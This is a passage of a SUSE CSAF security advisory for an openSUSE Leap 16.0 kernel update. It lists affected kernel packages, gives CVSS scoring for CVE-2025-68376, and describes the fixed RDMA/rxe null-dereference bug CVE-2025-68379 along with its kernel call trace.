"url": "https://bugzilla.suse.com/1255529"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68376"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
